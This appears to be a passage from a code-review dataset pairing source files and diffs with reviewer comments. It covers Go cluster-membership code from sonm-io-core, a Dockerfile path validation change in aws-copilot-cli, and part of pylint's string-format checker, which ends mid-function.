zap.Error(err)) c.close(errors.WithStack(err)) return err } case <-c.ctx.Done(): return nil } } } func (c *cluster) hubWatch() error { log.G(c.ctx).Info("starting member watch goroutine") stopCh := make(chan struct{}) listener, err := c.store.WatchTree(c.cfg.MemberListKey, stopCh) if err != nil { c.close(err) } for { select { case members, ok := <-listener: if !ok { err := errors.WithStack(errors.New("hub watcher closed")) c.close(err) return err } else { for _, member := range members { if member.Value == nil { log.G(c.ctx).Debug("received cluster member with nil Value, skipping (this can happen due to consul peculiarities)", zap.Any("member", member)) continue } else { log.G(c.ctx).Debug("received cluster member, registering", zap.Any("member", member)) } err := c.registerMemberFromKV(member) if err != nil { log.G(c.ctx).Warn("trash data in cluster members folder: ", zap.Any("kvPair", member), zap.Error(err)) } } } case <-c.ctx.Done(): close(stopCh) return nil } } } func (c *cluster) checkHub(id string) error { if id == c.id { return nil } exists, err := c.store.Exists(c.cfg.MemberListKey + "/" + id) if err != nil { return err } if !exists { log.G(c.ctx).Info("hub is offline, removing", zap.String("hubId", id)) 
c.leaderLock.Lock() defer c.leaderLock.Unlock() cli, ok := c.clients[id] if ok { cli.conn.Close() delete(c.clients, id) } } return nil } func (c *cluster) hubGC() error { log.G(c.ctx).Info("starting hub GC goroutine") t := time.NewTicker(makeDuration(c.cfg.MemberGCPeriod)) defer t.Stop() for { select { case <-t.C: c.leaderLock.RLock() idsToCheck := make([]string, 0) for id := range c.clients { idsToCheck = append(idsToCheck, id) } c.leaderLock.RUnlock() for _, id := range idsToCheck { err := c.checkHub(id) if err != nil { log.G(c.ctx).Warn("failed to check hub", zap.String("hubId", id), zap.Error(err)) } else { log.G(c.ctx).Info("checked hub", zap.String("hubId", id)) } } case <-c.ctx.Done(): return nil } } } //TODO: extract this to some kind of store wrapper over boltdb func (c *cluster) watchEventsTree(stopCh <-chan struct{}) (<-chan []*store.KVPair, error) { if c.cfg.Failover { return c.store.WatchTree(c.cfg.SynchronizableEntitiesPrefix, stopCh) } opts := store.WriteOptions{ IsDir: true, } empty := make([]byte, 0) c.store.Put(c.cfg.SynchronizableEntitiesPrefix, empty, &opts) ch := make(chan []*store.KVPair, 1) data := make(map[string]*store.KVPair) updater := func() error { changed := false pairs, err := c.store.List(c.cfg.SynchronizableEntitiesPrefix) if err != nil { return err } filteredPairs := make([]*store.KVPair, 0) for _, pair := range pairs { if pair.Key == c.cfg.SynchronizableEntitiesPrefix { continue } filteredPairs = append(filteredPairs, pair) cur, ok := data[pair.Key] if !ok || !bytes.Equal(cur.Value, pair.Value) { changed = true data[pair.Key] = pair } } if changed { ch <- filteredPairs } return nil } if err := updater(); err != nil { return nil, err } go func() { t := time.NewTicker(time.Second * 1) defer t.Stop() for { select { case <-c.ctx.Done(): return case <-t.C: err := updater() if err != nil { c.close(err) } } } }() return ch, nil } func (c *cluster) watchEvents() error { log.G(c.ctx).Info("subscribing on sync folder") watchStopChannel := make(chan struct{}) ch, err := c.watchEventsTree(watchStopChannel) if err != nil { c.close(err) return err } for { select { case <-c.ctx.Done(): close(watchStopChannel) return nil case kvList, ok := <-ch: if !ok { err := errors.WithStack(errors.New("watch channel is closed")) c.close(err) return err } for _, kv := range kvList { name := fetchNameFromPath(kv.Key) t, err := c.typeByName(name) if err != nil { log.G(c.ctx).Warn("unknown synchronizable entity", zap.String("entity", name)) continue } value := reflect.New(t) err = json.Unmarshal(kv.Value, value.Interface()) if err != nil { log.G(c.ctx).Warn("can not unmarshal entity", zap.Error(err)) } else { log.G(c.ctx).Debug("received cluster event", zap.String("name", name), zap.Any("value", value.Interface())) c.eventChannel <- reflect.Indirect(value).Interface() } } } } } func (c *cluster) nameByEntity(entity interface{}) (string, error) { c.registeredEntitiesMu.RLock() defer c.registeredEntitiesMu.RUnlock() t := reflect.TypeOf(entity) name, ok := c.entityNames[t] if !ok { return "", errors.New("entity " + t.String() + " is not registered") } return name, nil } func (c *cluster) typeByName(name string) (reflect.Type, error) { c.registeredEntitiesMu.RLock() defer c.registeredEntitiesMu.RUnlock() t, ok := c.registeredEntities[name] if !ok { return nil, errors.New("entity " + name + " is not registered") } return t, nil } func makeStore(ctx context.Context, cfg *ClusterConfig) (store.Store, error) { consul.Register() boltdb.Register() log.G(ctx).Info("creating store", zap.Any("store", 
cfg)) endpoints := []string{cfg.Store.Endpoint} backend := store.Backend(cfg.Store.Type) var tlsConf *tls.Config if len(cfg.Store.CertFile) != 0 && len(cfg.Store.KeyFile) != 0 { cer, err := tls.LoadX509KeyPair(cfg.Store.CertFile, cfg.Store.KeyFile) if err != nil { return nil, err } tlsConf = &tls.Config{ Certificates: []tls.Certificate{cer}, } } config := store.Config{ TLS: tlsConf, } config.Bucket = cfg.Store.Bucket return libkv.NewStore(backend, endpoints, &config) } func (c *cluster) close(err error) { log.G(c.ctx).Error("cluster failure", zap.Error(err)) c.leaderLock.Lock() c.leaderId = "" c.isLeader = false c.leaderLock.Unlock() c.Close() } func (c *cluster) emitLeadershipEvent() { c.leaderLock.Lock() defer c.leaderLock.Unlock() endpoints, _ := c.clusterEndpoints[c.leaderId] c.eventChannel <- LeadershipEvent{ Held: c.isLeader, LeaderId: c.leaderId, LeaderEndpoints: endpoints, } } func (c *cluster) memberExists(id string) bool { c.leaderLock.RLock() defer c.leaderLock.RUnlock() _, ok := c.clients[id] return ok } func (c *cluster) registerMemberFromKV(member *store.KVPair) error { id := fetchNameFromPath(member.Key) if id == c.id { return nil } if c.memberExists(id) { return nil } endpoints := make([]string, 0) err := json.Unmarshal(member.Value, &endpoints) if err != nil { return err } return c.registerMember(id, endpoints) } func (c *cluster) registerMember(id string, endpoints []string) error { log.G(c.ctx).Info("fetched endpoints of new member", zap.Any("endpoints", endpoints)) c.leaderLock.Lock() c.clusterEndpoints[id] = endpoints c.eventChannel <- NewMemberEvent{id, endpoints} c.leaderLock.Unlock() if id == c.id { return nil } for _, ep := range endpoints { conn, err := util.MakeGrpcClient(c.ctx, ep, c.creds, grpc.WithBlock(), grpc.WithTimeout(time.Second*5)) if err != nil { log.G(c.ctx).Warn("could not connect to hub", zap.String("endpoint", ep), zap.Error(err)) continue } else { log.G(c.ctx).Info("successfully connected to cluster member") c.leaderLock.Lock() defer c.leaderLock.Unlock() _, ok := c.clients[id] if ok { log.G(c.ctx).Info("duplicated connection - dropping") conn.Close() return nil } c.clients[id] = &client{pb.NewHubClient(conn), conn} return nil } } return errors.New("could not connect to any provided member endpoint") } func fetchNameFromPath(key string) string { parts := strings.Split(key, "/") return parts[len(parts)-1] } func makeDuration(numSeconds uint64) time.Duration { return time.Second * time.Duration(numSeconds) } func parseEndpoints(config *ClusterConfig) ([]string, error) { endpoints := make([]string, 0) host, port, err := net.SplitHostPort(config.Endpoint) if len(host) != 0 { endpoints = append(endpoints, config.Endpoint) return endpoints, nil } systemIPs, err := util.GetAvailableIPs() if err != nil { return nil, err } for _, ip := range systemIPs { if ip4 := ip.To4(); ip4 != nil { endpoints = append(endpoints, ip4.String()+":"+port) } else { endpoints = append(endpoints, "["+ip.String()+"]:"+port) } } return endpoints, nil }
1
5,999
What happens if I set SynchronizableEntitiesPrefix to "a/b/c/d" in the config?
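A minimal sketch (not from the repo) of how the existing helpers would behave with such a nested prefix: Synchronize() writes keys as SynchronizableEntitiesPrefix + "/" + name, and fetchNameFromPath keeps only the last "/"-separated segment, so entity names still resolve; the remaining question is how the configured KV backend treats the extra directory levels. The "devices" entity name below is hypothetical.

package main

import (
	"fmt"
	"strings"
)

// fetchNameFromPath mirrors the helper in the file above: it keeps only
// the last "/"-separated segment of a storage key.
func fetchNameFromPath(key string) string {
	parts := strings.Split(key, "/")
	return parts[len(parts)-1]
}

func main() {
	// Hypothetical nested prefix from the review question.
	prefix := "a/b/c/d"

	// Keys are written as prefix + "/" + entity name, as in Synchronize().
	key := prefix + "/" + "devices"

	// The entity name is still recovered from the nested key.
	fmt.Println(fetchNameFromPath(key)) // prints "devices"
}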
sonm-io-core
go
@@ -83,9 +83,13 @@ func (opts *InitAppOpts) Validate() error {
 		}
 	}
 	if opts.DockerfilePath != "" {
-		if _, err := listDockerfiles(opts.fs, opts.DockerfilePath); err != nil {
+		isDir, err := afero.IsDir(opts.fs, opts.DockerfilePath)
+		if err != nil {
 			return err
 		}
+		if isDir {
+			return fmt.Errorf("dockerfile path expected, got %s", opts.DockerfilePath)
+		}
 	}
 	if opts.ProjectName() == "" {
 		return errNoProjectInWorkspace
1
// Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. // SPDX-License-Identifier: Apache-2.0 package cli import ( "errors" "fmt" "os" "path/filepath" "strings" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/archer" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/aws/session" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/deploy/cloudformation" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/manifest" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/store" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/term/color" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/term/log" termprogress "github.com/aws/amazon-ecs-cli-v2/internal/pkg/term/progress" "github.com/aws/amazon-ecs-cli-v2/internal/pkg/workspace" "github.com/spf13/afero" "github.com/spf13/cobra" ) const ( fmtAddAppToProjectStart = "Creating ECR repositories for application %s." fmtAddAppToProjectFailed = "Failed to create ECR repositories for application %s." fmtAddAppToProjectComplete = "Created ECR repositories for application %s." ) // InitAppOpts holds the configuration needed to create a new application. type InitAppOpts struct { // Fields with matching flags. AppType string AppName string DockerfilePath string // Interfaces to interact with dependencies. fs afero.Fs manifestWriter archer.ManifestIO appStore archer.ApplicationStore projGetter archer.ProjectGetter projDeployer projectDeployer prog progress // Outputs stored on successful actions. manifestPath string *GlobalOpts } // Ask prompts for fields that are required but not passed in. func (opts *InitAppOpts) Ask() error { if opts.AppType == "" { if err := opts.askAppType(); err != nil { return err } } if opts.AppName == "" { if err := opts.askAppName(); err != nil { return err } } if opts.DockerfilePath == "" { if err := opts.askDockerfile(); err != nil { return err } } return nil } // Validate returns an error if the flag values passed by the user are invalid. func (opts *InitAppOpts) Validate() error { if opts.AppType != "" { if err := validateApplicationType(opts.AppType); err != nil { return err } } if opts.AppName != "" { if err := validateApplicationName(opts.AppName); err != nil { return err } } if opts.DockerfilePath != "" { if _, err := listDockerfiles(opts.fs, opts.DockerfilePath); err != nil { return err } } if opts.ProjectName() == "" { return errNoProjectInWorkspace } return nil } // Execute writes the application's manifest file and stores the application in SSM. 
func (opts *InitAppOpts) Execute() error { if err := opts.ensureNoExistingApp(opts.ProjectName(), opts.AppName); err != nil { return err } manifestPath, err := opts.createManifest() if err != nil { return err } opts.manifestPath = manifestPath log.Infoln() log.Successf("Wrote the manifest for %s app at '%s'\n", color.HighlightUserInput(opts.AppName), color.HighlightResource(opts.manifestPath)) log.Infoln("Your manifest contains configurations like your container size and ports.") log.Infoln() proj, err := opts.projGetter.GetProject(opts.ProjectName()) if err != nil { return fmt.Errorf("get project %s: %w", opts.ProjectName(), err) } opts.prog.Start(fmt.Sprintf(fmtAddAppToProjectStart, opts.AppName)) if err := opts.projDeployer.AddAppToProject(proj, opts.AppName); err != nil { opts.prog.Stop(log.Serrorf(fmtAddAppToProjectFailed, opts.AppName)) return fmt.Errorf("add app %s to project %s: %w", opts.AppName, opts.ProjectName(), err) } opts.prog.Stop(log.Ssuccessf(fmtAddAppToProjectComplete, opts.AppName)) return opts.createAppInProject(opts.ProjectName()) } func (opts *InitAppOpts) createManifest() (string, error) { manifest, err := manifest.CreateApp(opts.AppName, opts.AppType, opts.DockerfilePath) if err != nil { return "", fmt.Errorf("generate a manifest: %w", err) } manifestBytes, err := manifest.Marshal() if err != nil { return "", fmt.Errorf("marshal manifest: %w", err) } filename := opts.manifestWriter.AppManifestFileName(opts.AppName) manifestPath, err := opts.manifestWriter.WriteFile(manifestBytes, filename) if err != nil { return "", fmt.Errorf("write manifest for app %s: %w", opts.AppName, err) } wkdir, err := os.Getwd() if err != nil { return "", fmt.Errorf("get working directory: %w", err) } relPath, err := filepath.Rel(wkdir, manifestPath) if err != nil { return "", fmt.Errorf("relative path of manifest file: %w", err) } return relPath, nil } func (opts *InitAppOpts) createAppInProject(projectName string) error { if err := opts.appStore.CreateApplication(&archer.Application{ Project: projectName, Name: opts.AppName, Type: opts.AppType, }); err != nil { return fmt.Errorf("saving application %s: %w", opts.AppName, err) } return nil } func (opts *InitAppOpts) askAppType() error { t, err := opts.prompt.SelectOne( "Which type of infrastructure pattern best represents your application?", `Your application's architecture. Most applications need additional AWS resources to run. To help setup the infrastructure resources, select what "kind" or "type" of application you want to build.`, manifest.AppTypes) if err != nil { return fmt.Errorf("failed to get type selection: %w", err) } opts.AppType = t return nil } func (opts *InitAppOpts) askAppName() error { name, err := opts.prompt.Get( fmt.Sprintf("What do you want to call this %s?", opts.AppType), fmt.Sprintf(`The name will uniquely identify this application within your %s project. Deployed resources (such as your service, logs) will contain this app's name and be tagged with it.`, opts.ProjectName()), validateApplicationName) if err != nil { return fmt.Errorf("failed to get application name: %w", err) } opts.AppName = name return nil } // askDockerfile prompts for the Dockerfile by looking at sub-directories with a Dockerfile. // If the user chooses to enter a custom path, then we prompt them for the path. 
func (opts *InitAppOpts) askDockerfile() error { // TODO https://github.com/aws/amazon-ecs-cli-v2/issues/206 dockerfiles, err := listDockerfiles(opts.fs, ".") if err != nil { return err } sel, err := opts.prompt.SelectOne( fmt.Sprintf("Which Dockerfile would you like to use for %s app?", opts.AppName), "Dockerfile to use for building your application's container image.", dockerfiles, ) if err != nil { return fmt.Errorf("failed to select Dockerfile: %w", err) } // NOTE: Trim "/Dockerfile" from the selected option for storing in the app manifest. opts.DockerfilePath = strings.TrimSuffix(sel, "/Dockerfile") return nil } func (opts *InitAppOpts) ensureNoExistingApp(projectName, appName string) error { _, err := opts.appStore.GetApplication(projectName, opts.AppName) // If the app doesn't exist - that's perfect, return no error. var existsErr *store.ErrNoSuchApplication if errors.As(err, &existsErr) { return nil } // If there's no error, that means we were able to fetch an existing app if err == nil { return fmt.Errorf("application %s already exists under project %s", appName, projectName) } // Otherwise, there was an error calling the store return fmt.Errorf("couldn't check if application %s exists in project %s: %w", appName, projectName, err) } // RecommendedActions returns follow-up actions the user can take after successfully executing the command. func (opts *InitAppOpts) RecommendedActions() []string { return []string{ fmt.Sprintf("Update your manifest %s to change the defaults.", color.HighlightResource(opts.manifestPath)), fmt.Sprintf("Run %s to deploy your application to a %s environment.", color.HighlightCode(fmt.Sprintf("ecs-preview app deploy --name %s --env %s", opts.AppName, defaultEnvironmentName)), defaultEnvironmentName), } } // BuildAppInitCmd build the command for creating a new application. func BuildAppInitCmd() *cobra.Command { opts := &InitAppOpts{ GlobalOpts: NewGlobalOpts(), } cmd := &cobra.Command{ Use: "init", Short: "Creates a new application in a project.", Long: `Creates a new application in a project. This command is also run as part of "ecs-preview init".`, Example: ` Create a "frontend" web application. 
/code $ ecs-preview app init --name frontend --app-type "Load Balanced Web App" --dockerfile ./frontend/Dockerfile`, PreRunE: runCmdE(func(cmd *cobra.Command, args []string) error { opts.fs = &afero.Afero{Fs: afero.NewOsFs()} store, err := store.New() if err != nil { return fmt.Errorf("couldn't connect to project datastore: %w", err) } opts.appStore = store opts.projGetter = store ws, err := workspace.New() if err != nil { return fmt.Errorf("workspace cannot be created: %w", err) } opts.manifestWriter = ws sess, err := session.Default() if err != nil { return err } opts.projDeployer = cloudformation.New(sess) opts.prog = termprogress.NewSpinner() return opts.Validate() }), RunE: runCmdE(func(cmd *cobra.Command, args []string) error { log.Warningln("It's best to run this command in the root of your workspace.") if err := opts.Ask(); err != nil { return err } if err := opts.Validate(); err != nil { // validate flags return err } return opts.Execute() }), PostRunE: func(cmd *cobra.Command, args []string) error { log.Infoln("Recommended follow-up actions:") for _, followup := range opts.RecommendedActions() { log.Infof("- %s\n", followup) } return nil }, } cmd.Flags().StringVarP(&opts.AppType, appTypeFlag, appTypeFlagShort, "" /* default */, appTypeFlagDescription) cmd.Flags().StringVarP(&opts.AppName, nameFlag, nameFlagShort, "" /* default */, appFlagDescription) cmd.Flags().StringVarP(&opts.DockerfilePath, dockerFileFlag, dockerFileFlagShort, "" /* default */, dockerFileFlagDescription) return cmd }
1
11,495
nit: This error message doesn't mention that the path is a directory; maybe something like "Dockerfile path is a directory: %s, please provide a path to a file".
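A hedged sketch of the suggested wording, wrapped in a hypothetical validateDockerfilePath helper purely for illustration; the real check lives inline in (*InitAppOpts).Validate and the final message is up to the authors.

package main

import (
	"fmt"

	"github.com/spf13/afero"
)

// validateDockerfilePath shows the reviewer's proposed error text when the
// given path points at a directory instead of a Dockerfile.
func validateDockerfilePath(fs afero.Fs, path string) error {
	isDir, err := afero.IsDir(fs, path)
	if err != nil {
		return err
	}
	if isDir {
		return fmt.Errorf("dockerfile path is a directory: %s, please provide a path to a file", path)
	}
	return nil
}

func main() {
	fs := afero.NewMemMapFs()
	_ = fs.MkdirAll("frontend", 0755)

	// Passing a directory triggers the suggested error message.
	fmt.Println(validateDockerfilePath(fs, "frontend"))
}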
aws-copilot-cli
go
@@ -26,6 +26,7 @@
 # Copyright (c) 2020 Anthony <[email protected]>
 # Copyright (c) 2021 Marc Mueller <[email protected]>
 # Copyright (c) 2021 Peter Kolbus <[email protected]>
+# Copyright (c) 2021 Daniel van Noord <[email protected]>

 # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
1
# Copyright (c) 2009-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2010 Daniel Harding <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2013-2020 Claudiu Popa <[email protected]> # Copyright (c) 2014 Brett Cannon <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Rene Zhang <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016, 2018 Jakub Wilk <[email protected]> # Copyright (c) 2016 Peter Dawyndt <[email protected]> # Copyright (c) 2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2017 Ville Skyttä <[email protected]> # Copyright (c) 2018, 2020 Anthony Sottile <[email protected]> # Copyright (c) 2018-2019 Lucas Cimon <[email protected]> # Copyright (c) 2018 Alan Chan <[email protected]> # Copyright (c) 2018 Yury Gribov <[email protected]> # Copyright (c) 2018 ssolanki <[email protected]> # Copyright (c) 2018 Nick Drozd <[email protected]> # Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]> # Copyright (c) 2019 Wes Turner <[email protected]> # Copyright (c) 2019 Djailla <[email protected]> # Copyright (c) 2019 Hugo van Kemenade <[email protected]> # Copyright (c) 2020 Matthew Suozzo <[email protected]> # Copyright (c) 2020 hippo91 <[email protected]> # Copyright (c) 2020 谭九鼎 <[email protected]> # Copyright (c) 2020 Anthony <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 Peter Kolbus <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/main/LICENSE """Checker for string formatting operations. """ import collections import numbers import re import tokenize from typing import TYPE_CHECKING, Iterable import astroid from pylint.checkers import BaseChecker, BaseTokenChecker, utils from pylint.checkers.utils import check_messages from pylint.constants import BUILTINS from pylint.interfaces import IAstroidChecker, IRawChecker, ITokenChecker if TYPE_CHECKING: from typing import Counter # typing.Counter added in Python 3.6.1 _AST_NODE_STR_TYPES = ("__builtin__.unicode", "__builtin__.str", "builtins.str") # Prefixes for both strings and bytes literals per # https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals _PREFIXES = { "r", "u", "R", "U", "f", "F", "fr", "Fr", "fR", "FR", "rf", "rF", "Rf", "RF", "b", "B", "br", "Br", "bR", "BR", "rb", "rB", "Rb", "RB", } SINGLE_QUOTED_REGEX = re.compile("(%s)?'''" % "|".join(_PREFIXES)) DOUBLE_QUOTED_REGEX = re.compile('(%s)?"""' % "|".join(_PREFIXES)) QUOTE_DELIMITER_REGEX = re.compile("(%s)?(\"|')" % "|".join(_PREFIXES), re.DOTALL) MSGS = { # pylint: disable=consider-using-namedtuple-or-dataclass "E1300": ( "Unsupported format character %r (%#02x) at index %d", "bad-format-character", "Used when an unsupported format character is used in a format string.", ), "E1301": ( "Format string ends in middle of conversion specifier", "truncated-format-string", "Used when a format string terminates before the end of a " "conversion specifier.", ), "E1302": ( "Mixing named and unnamed conversion specifiers in format string", "mixed-format-string", "Used when a format string contains both named (e.g. '%(foo)d') " "and unnamed (e.g. '%d') conversion specifiers. 
This is also " "used when a named conversion specifier contains * for the " "minimum field width and/or precision.", ), "E1303": ( "Expected mapping for format string, not %s", "format-needs-mapping", "Used when a format string that uses named conversion specifiers " "is used with an argument that is not a mapping.", ), "W1300": ( "Format string dictionary key should be a string, not %s", "bad-format-string-key", "Used when a format string that uses named conversion specifiers " "is used with a dictionary whose keys are not all strings.", ), "W1301": ( "Unused key %r in format string dictionary", "unused-format-string-key", "Used when a format string that uses named conversion specifiers " "is used with a dictionary that contains keys not required by the " "format string.", ), "E1304": ( "Missing key %r in format string dictionary", "missing-format-string-key", "Used when a format string that uses named conversion specifiers " "is used with a dictionary that doesn't contain all the keys " "required by the format string.", ), "E1305": ( "Too many arguments for format string", "too-many-format-args", "Used when a format string that uses unnamed conversion " "specifiers is given too many arguments.", ), "E1306": ( "Not enough arguments for format string", "too-few-format-args", "Used when a format string that uses unnamed conversion " "specifiers is given too few arguments", ), "E1307": ( "Argument %r does not match format type %r", "bad-string-format-type", "Used when a type required by format string " "is not suitable for actual argument type", ), "E1310": ( "Suspicious argument in %s.%s call", "bad-str-strip-call", "The argument to a str.{l,r,}strip call contains a duplicate character, ", ), "W1302": ( "Invalid format string", "bad-format-string", "Used when a PEP 3101 format string is invalid.", ), "W1303": ( "Missing keyword argument %r for format string", "missing-format-argument-key", "Used when a PEP 3101 format string that uses named fields " "doesn't receive one or more required keywords.", ), "W1304": ( "Unused format argument %r", "unused-format-string-argument", "Used when a PEP 3101 format string that uses named " "fields is used with an argument that " "is not required by the format string.", ), "W1305": ( "Format string contains both automatic field numbering " "and manual field specification", "format-combined-specification", "Used when a PEP 3101 format string contains both automatic " "field numbering (e.g. '{}') and manual field " "specification (e.g. 
'{0}').", ), "W1306": ( "Missing format attribute %r in format specifier %r", "missing-format-attribute", "Used when a PEP 3101 format string uses an " "attribute specifier ({0.length}), but the argument " "passed for formatting doesn't have that attribute.", ), "W1307": ( "Using invalid lookup key %r in format specifier %r", "invalid-format-index", "Used when a PEP 3101 format string uses a lookup specifier " "({a[1]}), but the argument passed for formatting " "doesn't contain or doesn't have that key as an attribute.", ), "W1308": ( "Duplicate string formatting argument %r, consider passing as named argument", "duplicate-string-formatting-argument", "Used when we detect that a string formatting is " "repeating an argument instead of using named string arguments", ), "W1309": ( "Using an f-string that does not have any interpolated variables", "f-string-without-interpolation", "Used when we detect an f-string that does not use any interpolation variables, " "in which case it can be either a normal string or a bug in the code.", ), } OTHER_NODES = ( astroid.Const, astroid.List, astroid.Lambda, astroid.FunctionDef, astroid.ListComp, astroid.SetComp, astroid.GeneratorExp, ) BUILTINS_STR = BUILTINS + ".str" BUILTINS_FLOAT = BUILTINS + ".float" BUILTINS_INT = BUILTINS + ".int" def get_access_path(key, parts): """Given a list of format specifiers, returns the final access path (e.g. a.b.c[0][1]). """ path = [] for is_attribute, specifier in parts: if is_attribute: path.append(f".{specifier}") else: path.append(f"[{specifier!r}]") return str(key) + "".join(path) def arg_matches_format_type(arg_type, format_type): if format_type in "sr": # All types can be printed with %s and %r return True if isinstance(arg_type, astroid.Instance): arg_type = arg_type.pytype() if arg_type == BUILTINS_STR: return format_type == "c" if arg_type == BUILTINS_FLOAT: return format_type in "deEfFgGn%" if arg_type == BUILTINS_INT: # Integers allow all types return True return False return True class StringFormatChecker(BaseChecker): """Checks string formatting operations to ensure that the format string is valid and the arguments match the format string. """ __implements__ = (IAstroidChecker,) name = "string" msgs = MSGS # pylint: disable=too-many-branches @check_messages( "bad-format-character", "truncated-format-string", "mixed-format-string", "bad-format-string-key", "missing-format-string-key", "unused-format-string-key", "bad-string-format-type", "format-needs-mapping", "too-many-format-args", "too-few-format-args", "bad-string-format-type", ) def visit_binop(self, node): if node.op != "%": return left = node.left args = node.right if not (isinstance(left, astroid.Const) and isinstance(left.value, str)): return format_string = left.value try: ( required_keys, required_num_args, required_key_types, required_arg_types, ) = utils.parse_format_string(format_string) except utils.UnsupportedFormatCharacter as exc: formatted = format_string[exc.index] self.add_message( "bad-format-character", node=node, args=(formatted, ord(formatted), exc.index), ) return except utils.IncompleteFormatString: self.add_message("truncated-format-string", node=node) return if required_keys and required_num_args: # The format string uses both named and unnamed format # specifiers. self.add_message("mixed-format-string", node=node) elif required_keys: # The format string uses only named format specifiers. # Check that the RHS of the % operator is a mapping object # that contains precisely the set of keys required by the # format string. 
if isinstance(args, astroid.Dict): keys = set() unknown_keys = False for k, _ in args.items: if isinstance(k, astroid.Const): key = k.value if isinstance(key, str): keys.add(key) else: self.add_message( "bad-format-string-key", node=node, args=key ) else: # One of the keys was something other than a # constant. Since we can't tell what it is, # suppress checks for missing keys in the # dictionary. unknown_keys = True if not unknown_keys: for key in required_keys: if key not in keys: self.add_message( "missing-format-string-key", node=node, args=key ) for key in keys: if key not in required_keys: self.add_message( "unused-format-string-key", node=node, args=key ) for key, arg in args.items: if not isinstance(key, astroid.Const): continue format_type = required_key_types.get(key.value, None) arg_type = utils.safe_infer(arg) if ( format_type is not None and arg_type not in (None, astroid.Uninferable) and not arg_matches_format_type(arg_type, format_type) ): self.add_message( "bad-string-format-type", node=node, args=(arg_type.pytype(), format_type), ) elif isinstance(args, (OTHER_NODES, astroid.Tuple)): type_name = type(args).__name__ self.add_message("format-needs-mapping", node=node, args=type_name) # else: # The RHS of the format specifier is a name or # expression. It may be a mapping object, so # there's nothing we can check. else: # The format string uses only unnamed format specifiers. # Check that the number of arguments passed to the RHS of # the % operator matches the number required by the format # string. args_elts = () if isinstance(args, astroid.Tuple): rhs_tuple = utils.safe_infer(args) num_args = None if hasattr(rhs_tuple, "elts"): args_elts = rhs_tuple.elts num_args = len(args_elts) elif isinstance(args, (OTHER_NODES, (astroid.Dict, astroid.DictComp))): args_elts = [args] num_args = 1 else: # The RHS of the format specifier is a name or # expression. It could be a tuple of unknown size, so # there's nothing we can check. 
num_args = None if num_args is not None: if num_args > required_num_args: self.add_message("too-many-format-args", node=node) elif num_args < required_num_args: self.add_message("too-few-format-args", node=node) for arg, format_type in zip(args_elts, required_arg_types): if not arg: continue arg_type = utils.safe_infer(arg) if ( arg_type not in ( None, astroid.Uninferable, ) and not arg_matches_format_type(arg_type, format_type) ): self.add_message( "bad-string-format-type", node=node, args=(arg_type.pytype(), format_type), ) @check_messages("f-string-without-interpolation") def visit_joinedstr(self, node): if isinstance(node.parent, astroid.FormattedValue): return for value in node.values: if isinstance(value, astroid.FormattedValue): return self.add_message("f-string-without-interpolation", node=node) @check_messages(*MSGS) def visit_call(self, node): func = utils.safe_infer(node.func) if ( isinstance(func, astroid.BoundMethod) and isinstance(func.bound, astroid.Instance) and func.bound.name in ("str", "unicode", "bytes") ): if func.name in ("strip", "lstrip", "rstrip") and node.args: arg = utils.safe_infer(node.args[0]) if not isinstance(arg, astroid.Const) or not isinstance(arg.value, str): return if len(arg.value) != len(set(arg.value)): self.add_message( "bad-str-strip-call", node=node, args=(func.bound.name, func.name), ) elif func.name == "format": self._check_new_format(node, func) def _detect_vacuous_formatting(self, node, positional_arguments): counter = collections.Counter( arg.name for arg in positional_arguments if isinstance(arg, astroid.Name) ) for name, count in counter.items(): if count == 1: continue self.add_message( "duplicate-string-formatting-argument", node=node, args=(name,) ) def _check_new_format(self, node, func): """Check the new string formatting.""" # Skip format nodes which don't have an explicit string on the # left side of the format operation. # We do this because our inference engine can't properly handle # redefinitions of the original string. # Note that there may not be any left side at all, if the format method # has been assigned to another variable. See issue 351. For example: # # fmt = 'some string {}'.format # fmt('arg') if isinstance(node.func, astroid.Attribute) and not isinstance( node.func.expr, astroid.Const ): return if node.starargs or node.kwargs: return try: strnode = next(func.bound.infer()) except astroid.InferenceError: return if not (isinstance(strnode, astroid.Const) and isinstance(strnode.value, str)): return try: call_site = astroid.arguments.CallSite.from_call(node) except astroid.InferenceError: return try: fields, num_args, manual_pos = utils.parse_format_method_string( strnode.value ) except utils.IncompleteFormatString: self.add_message("bad-format-string", node=node) return positional_arguments = call_site.positional_arguments named_arguments = call_site.keyword_arguments named_fields = {field[0] for field in fields if isinstance(field[0], str)} if num_args and manual_pos: self.add_message("format-combined-specification", node=node) return check_args = False # Consider "{[0]} {[1]}" as num_args. num_args += sum(1 for field in named_fields if field == "") if named_fields: for field in named_fields: if field and field not in named_arguments: self.add_message( "missing-format-argument-key", node=node, args=(field,) ) for field in named_arguments: if field not in named_fields: self.add_message( "unused-format-string-argument", node=node, args=(field,) ) # num_args can be 0 if manual_pos is not. 
